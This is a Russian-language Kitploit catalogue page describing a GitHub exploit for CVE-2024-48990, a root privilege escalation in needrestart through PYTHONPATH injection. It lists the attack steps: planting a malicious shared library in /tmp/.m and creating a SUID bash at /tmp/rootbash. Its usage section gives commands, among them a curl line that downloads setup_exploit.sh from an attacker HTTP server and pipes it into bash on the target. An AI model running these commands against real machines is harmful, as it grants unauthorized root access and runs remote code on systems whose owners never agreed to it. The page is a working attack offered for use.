Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/mladicstefan/cve-2024-48990
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubmladicstefan/cve-2024-48990

CVE-2024-48990

Полный эксплойт для needsrestart setuid root shell

Репозиторий
9 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт CVE-2024-48990

Локальное повышение привилегий в needrestart < 3.8 через внедрение PYTHONPATH.

Как это работает

  1. needrestart выполняется от root и сканирует все процессы
  2. Находит наш процесс Python, читает PYTHONPATH=/tmp/.m из /proc/[pid]/environ
  3. Запускает Python от root с нашим вредоносным PYTHONPATH
  4. Импорт Python загружает /tmp/.m/importlib/__init__.so (нашу вредоносную библиотеку)
  5. Конструктор в .so выполняется от root до того, как Python вообще запустится
  6. Создает SUID bash в /tmp/rootbash
  7. Выполните /tmp/rootbash -p для получения root-оболочки

Ключевой момент: needrestart доверяет переменным окружения из непривилегированных процессов и использует их при выполнении интерпретаторов от root.

Использование

Атакующий:

root@kitploit:~
./compile.sh
python3 -m http.server 8000

Цель:

root@kitploit:~
curl -sf http://10.10.14.109:8000/setup_exploit.sh | bash -s 10.10.14.109 8000
cd /tmp/.m && PYTHONPATH=/tmp/.m python3 e.py

Процесс e.py должен зависнуть и породить root после выполнения следующего из второго терминала:

root@kitploit:~
sudo needsrestard

первый терминал запустит root-оболочку

Авторы

Qualys Threat Research Unit - CVE-2024-48990

Скачать инструмент